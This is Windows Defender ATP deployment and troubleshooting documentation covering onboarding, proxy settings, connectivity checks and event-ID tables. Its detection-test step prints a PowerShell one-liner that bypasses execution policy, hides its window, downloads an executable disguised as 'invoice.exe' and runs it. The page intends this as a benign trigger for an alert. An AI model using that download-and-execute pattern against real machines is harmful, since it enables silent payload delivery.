You'll need to take the following steps to onboard non-Windows machines:
1. Select your preferred method of onboarding:
For macOS devices, you can choose to onboard through Windows Defender ATP or through a third-
party solution. For more information, see Microsoft Defender ATP for Mac.
For other non-Windows devices choose Onboard non-Windows machines through third-party
integration.
a. In the navigation pane, select Interoperability > Partners. Make sure the third-party
solution is listed.
a. In the Partner Applications tab, select the partner that supports your non-Windows
devices.
b. Select Open partner page to open the partner's page. Follow the instructions
provided on the page.
c. After creating an account or subscribing to the partner solution, you should get to a
stage where a tenant Global Admin in your organization is asked to accept a
permission request from the partner application. Read the permission request carefully
to make sure that it is aligned with the service that you require.
2. Run a detection test by following the instructions of the third-party solution.

Offboard non-Windows machines


1. Follow the third-party's documentation to disconnect the third-party solution from Windows Defender
ATP.
2. Remove permissions for the third-party solution in your Azure AD tenant.
a. Sign in to the Azure portal.
b. Select Azure Active Directory > Enterprise Applications.
c. Select the application you'd like to offboard.
d. Select the Delete button.

Related topics
Onboard Windows 10 machines
Onboard servers
Configure proxy and Internet connectivity settings
Troubleshooting Windows Defender Advanced Threat Protection onboarding issues
Onboard machines without Internet access to Windows Defender ATP
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
To onboard machines without Internet access, you'll need to take the following general steps:

On-premises machines
Set up Azure Log Analytics (formerly known as OMS Gateway) to act as a proxy or hub:
Azure Log Analytics Agent
Install and configure the Microsoft Monitoring Agent (MMA) to point to the Microsoft Defender ATP Workspace
key & ID
Offline machines in the same network as Azure Log Analytics
Configure MMA to point to:
the Azure Log Analytics IP as a proxy
the Microsoft Defender ATP workspace key & ID

Azure virtual machines


Configure and enable an Azure Log Analytics workspace
Set up Azure Log Analytics (formerly known as OMS Gateway) to act as a proxy or hub:
Azure Log Analytics Agent
Install and configure the Microsoft Monitoring Agent (MMA) to point to the Microsoft Defender ATP
Workspace key & ID
Offline Azure VMs in the same network as the OMS Gateway
Configure the Azure Log Analytics IP as a proxy
Azure Log Analytics Workspace Key & ID
Azure Security Center (ASC)
Security Policy > Log Analytics Workspace
Threat Detection > Allow Windows Defender ATP to access my data
For more information, see Working with security policies.
Run a detection test on a newly onboarded Windows Defender ATP machine
4/22/2019 • 2 minutes to read

Applies to:
Supported Windows 10 versions
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803
Windows Server, 2019
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the
Windows Defender ATP service.
1. Create a folder: 'C:\test-WDATP-test'.
2. Open an elevated command-line prompt on the machine and run the script:
a. Go to Start and type cmd.
b. Right-click Command Prompt and select Run as administrator.

3. At the prompt, copy and run the following command:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference='silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'

The Command Prompt window will close automatically. If successful, the detection test will be marked as
completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.

Related topics
Onboard Windows 10 machines
Onboard servers
Experience Windows Defender ATP through simulated attacks
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

TIP
Learn about the latest enhancements in Windows Defender ATP: What's new in Windows Defender ATP.
Windows Defender ATP demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation.
Read: Insights from the MITRE ATT&CK-based evaluation.

You might want to experience Windows Defender ATP before you onboard more than a few machines to the
service. To do this, you can run controlled attack simulations on a few test machines. After running the simulated
attacks, you can review how Windows Defender ATP surfaces malicious activity and explore how it enables an
efficient response.

Before you begin


To run any of the provided simulations, you need at least one onboarded machine.
Read the walkthrough document provided with each attack scenario. Each document includes OS and application
requirements as well as detailed instructions that are specific to an attack scenario.

Run a simulation
1. In Help > Simulations & tutorials, select which of the available attack scenarios you would like to
simulate:
Scenario 1: Document drops backdoor - simulates delivery of a socially engineered lure
document. The document launches a specially crafted backdoor that gives attackers control.
Scenario 2: PowerShell script in fileless attack - simulates a fileless attack that relies on
PowerShell, showcasing attack surface reduction and machine learning detection of malicious
memory activity.
Scenario 3: Automated incident response - triggers Automated investigation, which automatically
hunts for and remediates breach artifacts to scale your incident response capacity.
2. Download and read the corresponding walkthrough document provided with your selected scenario.
3. Download the simulation file or copy the simulation script by navigating to Help > Simulations &
tutorials. You can choose to download the file or script on the test machine but it's not mandatory.
4. Run the simulation file or script on the test machine as instructed in the walkthrough document.
NOTE
Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test machine.
Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Onboard machines
Onboard Windows 10 machines
Configure machine proxy and Internet connectivity settings
5/3/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

The Windows Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and
communicate with the Windows Defender ATP service.
The embedded Windows Defender ATP sensor runs in system context using the LocalSystem account. The
sensor uses Microsoft Windows HTTP Services (WinHTTP) to enable communication with the Windows
Defender ATP cloud service.
The WinHTTP configuration setting is independent of the Windows Internet (WinINet) internet browsing proxy
settings and can only discover a proxy server by using the following discovery methods:
Auto-discovery methods:
Transparent proxy
Web Proxy Auto-discovery Protocol (WPAD)

NOTE
If you're using Transparent proxy or WPAD in your network topology, you don't need special configuration settings. For
more information on Windows Defender ATP URL exclusions in the proxy, see Enable access to Windows Defender ATP
service URLs in the proxy server.

Manual static proxy configuration:


Registry based configuration
WinHTTP configured using netsh command – Suitable only for desktops in a stable topology (for
example: a desktop in a corporate network behind the same proxy)

Configure the proxy server manually using a registry-based static proxy

Configure a registry-based static proxy to allow only the Windows Defender ATP sensor to report diagnostic data
and communicate with Windows Defender ATP services if a computer is not permitted to connect to the
Internet.
The static proxy is configurable through Group Policy (GP). The group policy can be found under:
Administrative Templates > Windows Components > Data Collection and Preview Builds > Configure
Authenticated Proxy usage for the Connected User Experience and Telemetry Service
Set it to Enabled and select Disable Authenticated Proxy usage:
Administrative Templates > Windows Components > Data Collection and Preview Builds >
Configure connected user experiences and telemetry:
Configure the proxy:
The policy sets two registry values, TelemetryProxyServer as REG_SZ and
DisableEnterpriseAuthProxy as REG_DWORD, under the registry key
HKLM\Software\Policies\Microsoft\Windows\DataCollection.

The registry value TelemetryProxyServer takes the following string format:

<server name or ip>:<port>

For example: 10.0.0.6:8080


The registry value DisableEnterpriseAuthProxy should be set to 1.

Configure the proxy server manually using netsh command


Use netsh to configure a system-wide static proxy.

NOTE
This will affect all applications including Windows services which use WinHTTP with default proxy.
Laptops that are changing topology (for example: from office to home) will malfunction with netsh. Use the registry-
based static proxy configuration.

1. Open an elevated command-line:


a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command and press Enter:

netsh winhttp set proxy <proxy>:<port>

For example: netsh winhttp set proxy 10.0.0.6:8080


To reset the winhttp proxy, enter the following command and press Enter

netsh winhttp reset proxy

See Netsh Command Syntax, Contexts, and Formatting to learn more.

Enable access to Windows Defender ATP service URLs in the proxy server

If a proxy or firewall is blocking all traffic by default and allowing only specific domains through, or HTTPS
scanning (SSL inspection) is enabled, make sure that the following URLs are not blocked by default. Do not
disable security monitoring or inspection of these URLs, but allow them as you would other internet traffic. They
permit communication with the Windows Defender ATP service on ports 80 and 443:

NOTE
URLs that include v20 in them are only needed if you have Windows 10, version 1803 or later machines. For example,
us-v20.events.data.microsoft.com is only needed if the machine is on Windows 10, version 1803 or later.

SERVICE LOCATION               MICROSOFT.COM DNS RECORD
Common URLs for all locations  *.blob.core.windows.net
                               crl.microsoft.com
                               ctldl.windowsupdate.com
                               events.data.microsoft.com
                               notify.windows.com
European Union                 eu.vortex-win.data.microsoft.com
                               eu-v20.events.data.microsoft.com
                               winatp-gw-neu.microsoft.com
                               winatp-gw-weu.microsoft.com
United Kingdom                 uk.vortex-win.data.microsoft.com
                               uk-v20.events.data.microsoft.com
                               winatp-gw-uks.microsoft.com
                               winatp-gw-ukw.microsoft.com
United States                  us.vortex-win.data.microsoft.com
                               us-v20.events.data.microsoft.com
                               winatp-gw-cus.microsoft.com
                               winatp-gw-eus.microsoft.com

If a proxy or firewall is blocking anonymous traffic, as Windows Defender ATP sensor is connecting from system
context, make sure anonymous traffic is permitted in the previously listed URLs.

Windows Defender ATP service backend IP range


If your network devices don't support the URLs white-listed in the prior section, you can use the following
information.
Windows Defender ATP is built on Azure cloud, deployed in the following regions:
+<Region Name="uswestcentral">
+<Region Name="useast2">
+<Region Name="useast">
+<Region Name="europenorth">
+<Region Name="europewest">
+<Region Name="uksouth">
+<Region Name="ukwest">
You can find the Azure IP range on Microsoft Azure Datacenter IP Ranges.

NOTE
As a cloud-based solution, the IP range can change. It's recommended that you move to a DNS resolving setting.

Verify client connectivity to Windows Defender ATP service URLs


Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate through the
proxy server in your environment, and that the proxy server allows traffic to the Windows Defender ATP service
URLs.
1. Download the connectivity verification tool to the PC where the Windows Defender ATP sensor is running.
2. Extract the contents of WDATPConnectivityAnalyzer on the machine.
3. Open an elevated command-line:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
4. Enter the following command and press Enter:

HardDrivePath\WDATPConnectivityAnalyzer.cmd

Replace HardDrivePath with the path where the WDATPConnectivityAnalyzer tool was downloaded to,
for example

C:\Work\tools\WDATPConnectivityAnalyzer\WDATPConnectivityAnalyzer.cmd

5. Extract the WDATPConnectivityAnalyzerResult.zip file created by the tool in the HardDrivePath
folder.
6. Open WDATPConnectivityAnalyzer.txt and verify that you have performed the proxy configuration steps
to enable server discovery and access to the service URLs.

The tool checks the connectivity of Windows Defender ATP service URLs that Windows Defender ATP
client is configured to interact with. It then prints the results into the WDATPConnectivityAnalyzer.txt file
for each URL that can potentially be used to communicate with the Windows Defender ATP services. For
example:
Testing URL : https://xxx.microsoft.com/xxx
1 - Default proxy: Succeeded (200)
2 - Proxy auto discovery (WPAD): Succeeded (200)
3 - Proxy disabled: Succeeded (200)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist

If at least one of the connectivity options returns a (200) status, then the Windows Defender ATP client can
communicate with the tested URL properly using this connectivity method.

However, if the connectivity check results indicate a failure, an HTTP error is displayed (see HTTP Status Codes).
You can then use the URLs in the table shown in Enable access to Windows Defender ATP service URLs in the
proxy server. The URLs you'll use will depend on the region selected during the onboarding procedure.

NOTE
When TelemetryProxyServer is set, in the registry or via Group Policy, Windows Defender ATP falls back to a direct
connection if it can't reach the defined proxy.
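The analyzer output is one block per URL, as shown above, and a machine is only healthy when every URL has at least one method that returned 200. The following PowerShell parser is an added example, not part of the original page or of the analyzer tool: it reads WDATPConnectivityAnalyzer.txt, reports each URL as OK or BLOCKED, and lists which connectivity methods worked. The sample text at the bottom is constructed to match the format on this page (the URLs and failure statuses in it are hypothetical).

```powershell
# Added example (not from the original page): summarize WDATPConnectivityAnalyzer.txt.
# A URL counts as reachable when at least one of the numbered methods returned HTTP 200.

function Get-WdatpConnectivitySummary {
    param([Parameter(Mandatory)][string[]]$Lines)

    $results = New-Object System.Collections.Generic.List[object]
    $current = $null
    foreach ($line in $Lines) {
        # Each block starts with "Testing URL : https://..."
        if ($line -match '^\s*Testing URL\s*:\s*(\S+)') {
            if ($current) { $results.Add($current) }
            $current = [pscustomobject]@{ Url = $Matches[1]; Methods = @{}; Reachable = $false }
            continue
        }
        # Method lines look like "1 - Default proxy: Succeeded (200)" or "4 - Named proxy: Doesn't exist"
        if ($current -and $line -match '^\s*\d+\s*-\s*(.+?):\s*(.+?)\s*$') {
            $method  = $Matches[1]
            $outcome = $Matches[2]
            $current.Methods[$method] = $outcome
            if ($outcome -match '\(200\)') { $current.Reachable = $true }
        }
    }
    if ($current) { $results.Add($current) }
    return $results
}

function Show-WdatpConnectivitySummary {
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($r in Get-WdatpConnectivitySummary -Lines $Lines) {
        $working = @($r.Methods.Keys | Where-Object { $r.Methods[$_] -match '\(200\)' })
        $state = if ($r.Reachable) { 'OK     ' } else { 'BLOCKED' }
        $via   = if ($working.Count) { $working -join ', ' } else { 'none - allow this URL on the proxy/firewall' }
        '{0} {1}  via: {2}' -f $state, $r.Url, $via
    }
}

# Constructed sample in the tool's output format (hypothetical URLs and statuses).
# For a real run use: Show-WdatpConnectivitySummary -Lines (Get-Content .\WDATPConnectivityAnalyzer.txt)
$sample = @'
Testing URL : https://example-gw.microsoft.com/test
1 - Default proxy: Succeeded (200)
2 - Proxy auto discovery (WPAD): Failed (407)
3 - Proxy disabled: Failed (connection refused)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist
Testing URL : https://example-events.microsoft.com/test
1 - Default proxy: Failed (403)
2 - Proxy auto discovery (WPAD): Failed (403)
3 - Proxy disabled: Failed (connection refused)
4 - Named proxy: Doesn't exist
5 - Command line proxy: Doesn't exist
'@ -split "`r?`n"

Show-WdatpConnectivitySummary -Lines $sample
```

A URL that is BLOCKED on every method with the same HTTP status from the proxy is the proxy's policy, not WinHTTP discovery; a URL that succeeds only with "Proxy disabled" means the sensor will work only while TelemetryProxyServer is unset or the direct fallback is reachable.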

Related topics
Onboard Windows 10 machines
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
4/8/2019 • 13 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Server 2012 R2
Windows Server 2016
You might need to troubleshoot the Windows Defender ATP onboarding process if you encounter issues. This page provides detailed steps
to troubleshoot onboarding issues that might occur when deploying with one of the deployment tools and common errors that might
occur on the machines.
If you have completed the onboarding process and don't see machines in the Machines list after an hour, it might indicate an onboarding or
connectivity problem.

Troubleshoot onboarding when deploying with Group Policy


Deployment with Group Policy is done by running the onboarding script on the machines. The Group Policy console does not indicate if
the deployment has succeeded or not.
If you have completed the onboarding process and don't see machines in the Machines list after an hour, you can check the output of the
script on the machines. For more information, see Troubleshoot onboarding when deploying with a script.
If the script completes successfully, see Troubleshoot onboarding issues on the machines for additional errors that might occur.

Troubleshoot onboarding issues when deploying with System Center Configuration Manager

When onboarding machines using the following versions of System Center Configuration Manager:
System Center 2012 Configuration Manager
System Center 2012 R2 Configuration Manager
System Center Configuration Manager (current branch) version 1511
System Center Configuration Manager (current branch) version 1602
Deployment with the above-mentioned versions of System Center Configuration Manager is done by running the onboarding script on the
machines. You can track the deployment in the Configuration Manager Console.
If the deployment fails, you can check the output of the script on the machines.
If the onboarding completed successfully but the machines are not showing up in the Machines list after an hour, see Troubleshoot
onboarding issues on the machine for additional errors that might occur.

Troubleshoot onboarding when deploying with a script


Check the result of the script on the machine:
1. Click Start, type Event Viewer, and press Enter.
2. Go to Windows Logs > Application.
3. Look for an event from WDATPOnboarding event source.
If the script fails and the event is an error, you can check the event ID in the following table to help you troubleshoot the issue.

NOTE
The following event IDs are specific to the onboarding script only.

Event ID 5
Error type: Offboarding data was found but couldn't be deleted
Resolution steps: Check the permissions on the registry, specifically
HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection.

Event ID 10
Error type: Onboarding data couldn't be written to registry
Resolution steps: Check the permissions on the registry, specifically
HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat.
Verify that the script was run as an administrator.

Event ID 15
Error type: Failed to start SENSE service
Resolution steps: Check the service health (sc query sense command). Make sure it's not in an intermediate
state ('Pending_Stopped', 'Pending_Running') and try to run the script again (with administrator rights).
If the machine is running Windows 10, version 1607 and running the command sc query sense returns
START_PENDING, reboot the machine. If rebooting the machine doesn't address the issue, upgrade to KB4015217
and try onboarding again.

Event ID 15
Error type: Failed to start SENSE service
Resolution steps: If the message of the error is: System error 577 has occurred, you need to enable the
Windows Defender Antivirus ELAM driver; see Ensure that Windows Defender Antivirus is not disabled by a policy
for instructions.

Event ID 30
Error type: The script failed to wait for the service to start running
Resolution steps: The service could have taken more time to start or has encountered errors while trying to
start. For more information on events and errors related to SENSE, see Review events and errors using Event
viewer.

Event ID 35
Error type: The script failed to find needed onboarding status registry value
Resolution steps: When the SENSE service starts for the first time, it writes onboarding status to the registry
location HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status. The script failed to find it after
several seconds. You can manually test it and check if it's there. For more information on events and errors
related to SENSE, see Review events and errors using Event viewer.

Event ID 40
Error type: SENSE service onboarding status is not set to 1
Resolution steps: The SENSE service has failed to onboard properly. For more information on events and errors
related to SENSE, see Review events and errors using Event viewer.

Event ID 65
Error type: Insufficient privileges
Resolution steps: Run the script again with administrator privileges.

Troubleshoot onboarding issues using Microsoft Intune


You can use Microsoft Intune to check error codes and attempt to troubleshoot the cause of the issue.
If you have configured policies in Intune and they are not propagated on machines, you might need to configure automatic MDM
enrollment.
Use the following tables to understand the possible causes of issues while onboarding:
Microsoft Intune error codes and OMA-URIs table
Known issues with non-compliance table
Mobile Device Management (MDM) event logs table
If none of the event logs and troubleshooting steps work, download the Local script from the Machine management section of the
portal, and run it in an elevated command prompt.
Microsoft Intune error codes and OMA-URIs:

Error code (hex): 0x87D1FDE8
Error code (dec): -2016281112
Error description: Remediation failed
Affected OMA-URIs: Onboarding, Offboarding
Possible cause: Onboarding or offboarding failed on a wrong blob: wrong signature or missing PreviousOrgIds
fields.
Troubleshooting steps: Check the event IDs in the View agent onboarding errors in the machine event log section.
Check the MDM event logs in the following table or follow the instructions in Diagnose MDM failures in
Windows 10.

Error code (hex): 0x87D1FDE8
Error code (dec): -2016281112
Error description: Remediation failed
Affected OMA-URIs: Onboarding, Offboarding, SampleSharing
Possible cause: The Windows Defender ATP Policy registry key does not exist or the OMA DM client doesn't have
permissions to write to it.
Troubleshooting steps: Ensure that the following registry key exists:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Micr
Advanced Threat Protection
If it doesn't exist, open an elevated command prompt and add the key.

Error code (hex): 0x87D1FDE8
Error code (dec): -2016281112
Error description: Remediation failed
Affected OMA-URIs: SenseIsRunning, OnboardingState, OrgId
Possible cause: An attempt to remediate by a read-only property. Onboarding has failed.
Troubleshooting steps: Check the troubleshooting steps in Troubleshoot onboarding issues on the machine.
Check the MDM event logs in the following table or follow the instructions in Diagnose MDM failures in
Windows 10.

Error code (hex): 0x87D1FDE8
Error code (dec): -2016281112
Error description: Remediation failed
Affected OMA-URIs: All
Possible cause: Attempt to deploy Windows Defender ATP on a non-supported SKU/Platform, particularly the
Holographic SKU.
Currently supported platforms: Enterprise, Education, and Professional. Server is not supported.

Error code (hex): 0x87D101A9
Error code (dec): -2016345687
Error description: Syncml(425): The requested command failed because the sender does not have adequate access
control permissions (ACL) on the recipient.
Affected OMA-URIs: All
Possible cause: Attempt to deploy Windows Defender ATP on a non-supported SKU/Platform, particularly the
Holographic SKU.
Currently supported platforms: Enterprise, Education, and Professional.
Known issues with non-compliance
The following table provides information on issues with non-compliance and how you can address the issues.

Case 1
Symptoms: Machine is compliant by the SenseIsRunning OMA-URI, but is non-compliant by the OrgId, Onboarding and
OnboardingState OMA-URIs.
Possible cause: Check that the user passed OOBE after Windows installation or upgrade. During OOBE, onboarding
couldn't be completed but SENSE is already running.
Troubleshooting steps: Wait for OOBE to complete.

Case 2
Symptoms: Machine is compliant by the OrgId, Onboarding, and OnboardingState OMA-URIs, but is non-compliant by
the SenseIsRunning OMA-URI.
Possible cause: The Sense service's startup type is set to "Delayed Start". Sometimes this causes the Microsoft
Intune server to report the machine as non-compliant by SenseIsRunning when the DM session occurs on system
start.
Troubleshooting steps: The issue should automatically be fixed within 24 hours.

Case 3
Symptoms: Machine is non-compliant.
Troubleshooting steps: Ensure that Onboarding and Offboarding policies are not deployed on the same machine at
the same time.

Mobile Device Management (MDM) event logs

View the MDM event logs to troubleshoot issues that might arise during onboarding:
Log name: Microsoft\Windows\DeviceManagement-EnterpriseDiagnostics-Provider
Channel name: Admin

ID: 1819
Severity: Error
Event description: Windows Defender Advanced Threat Protection CSP: Failed to Set Node's Value. NodeId: (%1),
TokenName: (%2), Result: (%3).
Troubleshooting steps: Download the Cumulative Update for Windows 10, 1607.

Troubleshoot onboarding issues on the machine


If the deployment tool you used does not indicate an error in the onboarding process, but machines are still not
appearing in the Machines list after an hour, go through the following verification topics to check whether an
error occurred with the Windows Defender ATP agent:
View agent onboarding errors in the machine event log
Ensure the diagnostic data service is enabled
Ensure the service is set to start
Ensure the machine has an Internet connection
Ensure that Windows Defender Antivirus is not disabled by a policy
View agent onboarding errors in the machine event log
1. Click Start, type Event Viewer, and press Enter.
2. In the Event Viewer (Local) pane, expand Applications and Services Logs > Microsoft > Windows > SENSE.

NOTE
SENSE is the internal name used to refer to the behavioral sensor that powers Windows Defender ATP.

3. Select Operational to load the log.


4. In the Action pane, click Filter Current log.
5. On the Filter tab, under Event level: select Critical, Warning, and Error, and click OK.
6. Events which can indicate issues will appear in the Operational pane. You can attempt to troubleshoot them based on the solutions
in the following table:

Event ID 5
Message: Windows Defender Advanced Threat Protection service failed to connect to the server at variable
Resolution steps: Ensure the machine has Internet access.

Event ID 6
Message: Windows Defender Advanced Threat Protection service is not onboarded and no onboarding parameters were
found. Failure code: variable
Resolution steps: Run the onboarding script again.

Event ID 7
Message: Windows Defender Advanced Threat Protection service failed to read the onboarding parameters. Failure
code: variable
Resolution steps: Ensure the machine has Internet access, then run the entire onboarding process again.

Event ID 9
Message: Windows Defender Advanced Threat Protection service failed to change its start type. Failure code:
variable
Resolution steps: If the event happened during onboarding, reboot and re-attempt running the onboarding script.
For more information, see Run the onboarding script again. If the event happened during offboarding, contact
support.

Event ID 10
Message: Windows Defender Advanced Threat Protection service failed to persist the onboarding information.
Failure code: variable
Resolution steps: If the event happened during onboarding, re-attempt running the onboarding script. For more
information, see Run the onboarding script again. If the problem persists, contact support.

Event ID 15
Message: Windows Defender Advanced Threat Protection cannot start command channel with URL: variable
Resolution steps: Ensure the machine has Internet access.

Event ID 17
Message: Windows Defender Advanced Threat Protection service failed to change the Connected User Experiences and
Telemetry service location. Failure code: variable
Resolution steps: Run the onboarding script again. If the problem persists, contact support.

Event ID 25
Message: Windows Defender Advanced Threat Protection service failed to reset health status in the registry.
Failure code: variable
Resolution steps: Contact support.

Event ID 27
Message: Failed to enable Windows Defender Advanced Threat Protection mode in Windows Defender. Onboarding
process failed. Failure code: variable
Resolution steps: Contact support.

Event ID 29
Message: Failed to read the offboarding parameters. Error type: %1, Error code: %2, Description: %3
Resolution steps: Ensure the machine has Internet access, then run the entire offboarding process again.

Event ID 30
Message: Failed to disable $(build.sense.productDisplayName) mode in Windows Defender Advanced Threat
Protection. Failure code: %1
Resolution steps: Contact support.

Event ID 32
Message: $(build.sense.productDisplayName) service failed to request to stop itself after offboarding process.
Failure code: %1
Resolution steps: Verify that the service start type is manual and reboot the machine.

Event ID 55
Message: Failed to create the Secure ETW autologger. Failure code: %1
Resolution steps: Reboot the machine.

Event ID 63
Message: Updating the start type of external service. Name: %1, actual start type: %2, expected start type: %3,
exit code: %4
Resolution steps: Identify what is causing changes in the start type of the mentioned service. If the exit code
is not 0, fix the start type manually to the expected start type.

Event ID 64
Message: Starting stopped external service. Name: %1, exit code: %2
Resolution steps: Contact support if the event keeps re-appearing.

Event ID 68
Message: The start type of the service is unexpected. Service name: %1, actual start type: %2, expected start
type: %3
Resolution steps: Identify what is causing changes in start type. Fix the mentioned service start type.

Event ID 69
Message: The service is stopped. Service name: %1
Resolution steps: Start the mentioned service. Contact support if the problem persists.
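The three logs this article has you open by hand (the Application log for the WDATPOnboarding script events, the SENSE Operational log filtered to Critical/Warning/Error, and the MDM Admin channel) can be read in one pass. The script below is an added example, not from the original page: it uses Get-WinEvent with the event-ID-to-resolution mappings copied from the tables above and prints a single timeline with the suggested step beside each event. Assumptions: the provider name for the script events is WDATPOnboarding as stated above; the Get-WinEvent log names for the SENSE and MDM channels (Microsoft-Windows-SENSE/Operational and Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin) are taken from the Event Viewer paths given on this page. Run it from an elevated PowerShell prompt.

```powershell
# Added example (not from the original page): triage onboarding events from the
# Application log (WDATPOnboarding), the SENSE operational log and the MDM Admin channel.
[CmdletBinding()]
param([int]$Hours = 24)

$since = (Get-Date).AddHours(-$Hours)

# Event ID -> resolution step, from the onboarding-script table on this page
$scriptHints = @{
    5  = 'Check permissions on HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    10 = 'Check registry permissions; verify the script ran as administrator'
    15 = 'sc query sense; reboot if START_PENDING; system error 577 => enable the Defender ELAM driver'
    30 = 'Service slow to start or failed; review the SENSE operational log'
    35 = 'Onboarding status missing under HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
    40 = 'Onboarding status not 1; review the SENSE operational log'
    65 = 'Re-run the script with administrator privileges'
}
# Event ID -> resolution step, from the SENSE operational table on this page
$senseHints = @{
    5  = 'Ensure Internet access';                    6  = 'Run the onboarding script again'
    7  = 'Ensure Internet access, then re-run onboarding'
    9  = 'Onboarding: reboot and re-run the script; offboarding: contact support'
    10 = 'Re-run the onboarding script; if it persists, contact support'
    15 = 'Ensure Internet access';                    17 = 'Run the onboarding script again'
    25 = 'Contact support';  27 = 'Contact support';  29 = 'Ensure Internet access, re-run offboarding'
    30 = 'Contact support';  32 = 'Verify the service start type is manual and reboot'
    55 = 'Reboot the machine'; 63 = 'Fix the start type of the named service'
    64 = 'Contact support if it keeps recurring';     68 = 'Fix the named service start type'
    69 = 'Start the named service'
}
$mdmHints = @{ 1819 = 'Install the Cumulative Update for Windows 10, 1607' }

function Get-OnboardingEvents {
    param([hashtable]$Filter, [hashtable]$Hints, [string]$Source)
    # Get-WinEvent throws when no events match; treat that as "nothing to report"
    try { $events = Get-WinEvent -FilterHashtable $Filter -ErrorAction Stop } catch { return }
    foreach ($e in $events) {
        $hint  = if ($Hints.ContainsKey($e.Id)) { $Hints[$e.Id] } else { '(not in the tables above)' }
        $first = if ($e.Message) { ($e.Message -split "`n")[0].Trim() } else { '' }
        [pscustomobject]@{
            Time = $e.TimeCreated; Log = $Source; Id = $e.Id
            Level = $e.LevelDisplayName; Hint = $hint; Detail = $first
        }
    }
}

$all = @(
    Get-OnboardingEvents -Source 'Script' -Hints $scriptHints -Filter @{
        LogName = 'Application'; ProviderName = 'WDATPOnboarding'; StartTime = $since }
    # Level 1 = Critical, 2 = Error, 3 = Warning (the same filter the steps above apply in Event Viewer)
    Get-OnboardingEvents -Source 'SENSE'  -Hints $senseHints  -Filter @{
        LogName = 'Microsoft-Windows-SENSE/Operational'; Level = 1, 2, 3; StartTime = $since }
    Get-OnboardingEvents -Source 'MDM'    -Hints $mdmHints    -Filter @{
        LogName = 'Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin'; StartTime = $since }
)

if ($all.Count -eq 0) { "No onboarding-related events in the last $Hours hours; check connectivity and services next." }
else { $all | Sort-Object Time | Format-Table -AutoSize -Wrap }
```

Read the output bottom-up: a script event 15 or 40 followed by SENSE events 5 or 15 points at connectivity, while a script event 15 with system error 577 in its detail points at the Defender ELAM policy check below.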

There are additional components on the machine that the Windows Defender ATP agent depends on to function properly. If there are no
onboarding related errors in the Windows Defender ATP agent event log, proceed with the following steps to ensure that the additional
components are configured correctly.
Ensure the diagnostic data service is enabled
If the machines aren't reporting correctly, you might need to check that the Windows 10 diagnostic data service is set to automatically start
and is running on the machine. The service might have been disabled by other programs or user configuration changes.
First, you should check that the service is set to start automatically when Windows starts, then you should check that the service is
currently running (and start it if it isn't).
Ensure the service is set to start
Use the command line to check the Windows 10 diagnostic data service startup type:
1. Open an elevated command-line prompt on the machine:
a. Click Start, type cmd, and press Enter.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

sc qc diagtrack

If the service is enabled, the output includes the line START_TYPE : 2 AUTO_START.
If the START_TYPE is not set to AUTO_START, then you'll need to set the service to automatically start.
Use the command line to set the Windows 10 diagnostic data service to automatically start:
1. Open an elevated command-line prompt on the machine:
a. Click Start, type cmd, and press Enter.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

sc config diagtrack start= auto

(sc.exe requires the space between start= and the value; without it the command prints usage and changes nothing.)

3. A success message is displayed. Verify the change by entering the following command, and press Enter:

sc qc diagtrack

4. Start the service.


a. In the command prompt, type the following command and press Enter:

sc start diagtrack

Ensure the machine has an Internet connection


The Windows Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the
Windows Defender ATP service.
WinHTTP is independent of the Internet browsing proxy settings and other user context applications and must be able to detect the proxy
servers that are available in your particular environment.
To ensure that sensor has service connectivity, follow the steps described in the Verify client connectivity to Windows Defender ATP service
URLs topic.
If the verification fails and your environment is using a proxy to connect to the Internet, then follow the steps described in Configure proxy
and Internet connectivity settings topic.
Ensure that Windows Defender Antivirus is not disabled by a policy
Problem: The Windows Defender ATP service does not start after onboarding.
Symptom: Onboarding successfully completes, but you see error 577 when trying to start the service.
Solution: Even if your machines are running a third-party antimalware client, the Windows Defender ATP agent needs the
Windows Defender Early Launch Antimalware (ELAM) driver to be enabled. You must ensure that it's not disabled in system policy.
Depending on the tool that you use to implement policies, you'll need to verify that the following Windows Defender policies are
cleared:
DisableAntiSpyware
DisableAntiVirus
For example, in Group Policy there should be no entries such as the following values:
<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiSpyware"/>
</Key>
